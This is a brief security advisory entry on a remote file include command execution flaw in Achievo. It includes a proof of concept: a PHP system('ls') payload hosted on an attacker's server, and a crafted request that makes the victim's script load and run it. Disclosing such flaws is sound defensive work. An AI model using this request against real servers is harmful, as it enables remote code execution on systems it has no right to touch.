|
Achievo Remote File Include Command Execution Vulnerability
The following example was submitted: Create the following text file (ls.txt) and store it on the attacker host where it is publicly accessible: <?php system('ls'); ?> And cause the vulnerable script on the victim host to invoke it with the following request: http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt? |
|
 Privacy Statement |
